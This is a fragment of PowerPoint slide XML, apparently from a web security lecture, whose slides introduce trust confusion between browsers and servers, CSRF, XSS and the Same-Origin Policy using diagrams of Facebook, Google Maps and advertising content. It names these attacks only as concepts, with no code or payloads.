        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Rechte verbindingslijn met pijl 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2126994" y="1855421"/>
            <a:ext cx="450350" cy="250968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kstvak 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644791" y="4005822"/>
            <a:ext cx="1252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JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15242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4" grpId="0"/>
      <p:bldP spid="4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67640" y="18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Confusion for user and web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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0415C0-6A13-44C7-8A94-44C174F178B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>49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6781155" y="3356992"/>
            <a:ext cx="1750845" cy="20162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 err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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04" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1590282" y="3073807"/>
            <a:ext cx="570102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07" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1547664" y="3354732"/>
            <a:ext cx="632926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42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13" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117598" y="1598292"/>
            <a:ext cx="2208102" cy="49011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advertising.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732" y="2410746"/>
            <a:ext cx="1100536" cy="1777034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4933400" y="1657016"/>
            <a:ext cx="1100700" cy="14648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17" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4951287" y="1198158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7" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076604" y="990623"/>
            <a:ext cx="2249096" cy="552450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600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maps.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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153920" y="2359768"/>
            <a:ext cx="2683349" cy="2370600"/>
            <a:chOff x="3021469" y="3278868"/>
            <a:chExt cx="2067965" cy="2271612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3021469" y="3278868"/>
              <a:ext cx="2067965" cy="227161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1800" b="0" strike="noStrike" spc="-1" dirty="0"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facebook</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="18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content</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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6" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4393846" y="4216422"/>
              <a:ext cx="559208" cy="2959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ad</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3873168" y="3885150"/>
              <a:ext cx="632723" cy="301252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="006600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map</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="16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33661" y="3288111"/>
              <a:ext cx="2044437" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3946471" y="4404880"/>
              <a:ext cx="545240" cy="515600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7" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4962707" y="1398045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8" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4945910" y="1933619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4"/>
          <a:srcRect b="54286"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2160384" y="2359768"/>
            <a:ext cx="2666820" cy="502577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698774" y="912266"/>
            <a:ext cx="2657202" cy="1232614"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -76793"/>
              <a:gd name="adj2" fmla="val 75771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What’s happening in my browser?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1" dirty="0"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And who am I interacting with?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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33" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2203630" y="3365274"/>
            <a:ext cx="1145913" cy="811516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other</a:t>
            </a:r>
          </a:p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user’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rechthoek 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027878" y="3592459"/>
            <a:ext cx="1124881" cy="10099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35" name="Rechthoek 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="3687958"/>
            <a:ext cx="1145088" cy="104240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44" name="Rechthoek 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189940" y="3773356"/>
            <a:ext cx="1251511" cy="104188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45" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023950" y="2504775"/>
            <a:ext cx="2788410" cy="965510"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27856"/>
              <a:gd name="adj2" fmla="val 125505"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC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Do these HTTP requests really come from our customer?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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46" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974399" y="3911716"/>
            <a:ext cx="1626414" cy="7771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47" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5004362" y="4091121"/>
            <a:ext cx="1565190" cy="661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" name="Tekstvak 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730169" y="5415807"/>
            <a:ext cx="555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This confusion be abused,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if user or server mistakenly trust the other party</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21520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A21A5-F689-B00B-2BFA-8CD5C4865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9283-6130-CE2B-1CD4-64D68B98D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Server-side injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   incl.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blind injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client-side injection attacks, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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33CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS in-depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The power of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM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Same Origin Policy (SOP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to control JavaScript and why it SOP fails in the case of XSS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33CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More server-side problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More client-side problems  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A7D5C-0F68-857D-94ED-38FBAB791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97BD51-E66C-119C-AF20-FAC6B1CD0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041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Abusing trust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Some attacks abuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  has in the browser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Server thinks an HTTP request was trigger by a deliberate user action  (who clicked on link, filled in form,…) , but instead it was some malicious JavaScript, a confusing malicious link, …  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 err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> CSRF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sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some attacks abuse  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has in the browser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Users thinks content comes from party A, and then trusts it,                      but in fact it comes from party B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/>
              <a:t>Recall from week 2: TLS was meant to solve this issue.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GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRP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GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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318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67640" y="18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Protections between content from different origins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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0415C0-6A13-44C7-8A94-44C174F178B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>51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6707925" y="3356992"/>
            <a:ext cx="1824075" cy="20162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 err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478640" y="2997941"/>
            <a:ext cx="523072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05" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974399" y="3911716"/>
            <a:ext cx="1626414" cy="7771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06" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5004362" y="4091121"/>
            <a:ext cx="1565190" cy="661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07" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1406074" y="3290003"/>
            <a:ext cx="519032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42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13" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117598" y="1598291"/>
            <a:ext cx="2193086" cy="4604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advertising.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4933400" y="1657016"/>
            <a:ext cx="1100700" cy="14648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17" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4951287" y="1198158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7" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076604" y="990622"/>
            <a:ext cx="2234080" cy="522271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600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maps.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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019599" y="2359768"/>
            <a:ext cx="2816427" cy="2370600"/>
            <a:chOff x="3021469" y="3278868"/>
            <a:chExt cx="2067965" cy="2271612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3021469" y="3278868"/>
              <a:ext cx="2067965" cy="227161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1800" b="0" strike="noStrike" spc="-1" dirty="0"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400" spc="-1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facebook</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400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content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2400" b="0" strike="noStrike" spc="-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4" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3100324" y="4227009"/>
              <a:ext cx="841388" cy="77763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other</a:t>
              </a:r>
            </a:p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user’s</a:t>
              </a:r>
            </a:p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content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4393846" y="4216422"/>
              <a:ext cx="559208" cy="29596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ad</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3873168" y="3885150"/>
              <a:ext cx="632723" cy="301252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="006600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strike="noStrike" spc="-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map</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="16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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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33661" y="3288111"/>
              <a:ext cx="2044437" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3969510" y="4445841"/>
              <a:ext cx="439616" cy="515600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7" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4962707" y="1398045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8" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4945910" y="1933619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41" name="Rechthoek 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027878" y="3592459"/>
            <a:ext cx="1124881" cy="10099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42" name="Rechthoek 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="3687958"/>
            <a:ext cx="1145088" cy="104240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189940" y="3773356"/>
            <a:ext cx="1251511" cy="104188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5065" b="55141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036204" y="2359768"/>
            <a:ext cx="2784383" cy="485962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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="347852" y="2468677"/>
            <a:ext cx="1078454" cy="162873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44791" y="4005822"/>
            <a:ext cx="1252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JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Tekstvak 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="5259451"/>
            <a:ext cx="70851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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The browser enforces the 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Same-Origin Policy (SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ensure content from different origins cannot interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31572687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67640" y="18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Same Origin Policy: what Facebook can see</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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0415C0-6A13-44C7-8A94-44C174F178B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>52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6707925" y="3356992"/>
            <a:ext cx="1824075" cy="20162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 err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478640" y="2997941"/>
            <a:ext cx="523072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07" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1406074" y="3290003"/>
            <a:ext cx="519032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42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13" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117598" y="1598291"/>
            <a:ext cx="2193086" cy="4604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advertising.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4933400" y="1657016"/>
            <a:ext cx="1100700" cy="14648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17" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4951287" y="1198158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7" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076604" y="990622"/>
            <a:ext cx="2234080" cy="522271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600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maps.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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019599" y="2359768"/>
            <a:ext cx="2816427" cy="2370600"/>
            <a:chOff x="3021469" y="3278868"/>
            <a:chExt cx="2067965" cy="2271612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3021469" y="3278868"/>
              <a:ext cx="2067965" cy="227161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1800" b="0" strike="noStrike" spc="-1" dirty="0"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400" spc="-1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facebook</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400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content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2400" b="0" strike="noStrike" spc="-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4" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3100324" y="4227009"/>
              <a:ext cx="841388" cy="77763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other</a:t>
              </a:r>
            </a:p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user’s</a:t>
              </a:r>
            </a:p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content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4393846" y="4216422"/>
              <a:ext cx="559208" cy="295967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1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sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3873168" y="3885150"/>
              <a:ext cx="632723" cy="301252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1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33661" y="3288111"/>
              <a:ext cx="2044437" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3969510" y="4445841"/>
              <a:ext cx="439616" cy="515600"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 50000"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF000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37" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4962707" y="1398045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8" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4945910" y="1933619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41" name="Rechthoek 40"/>
          <p:cNvSpPr/>
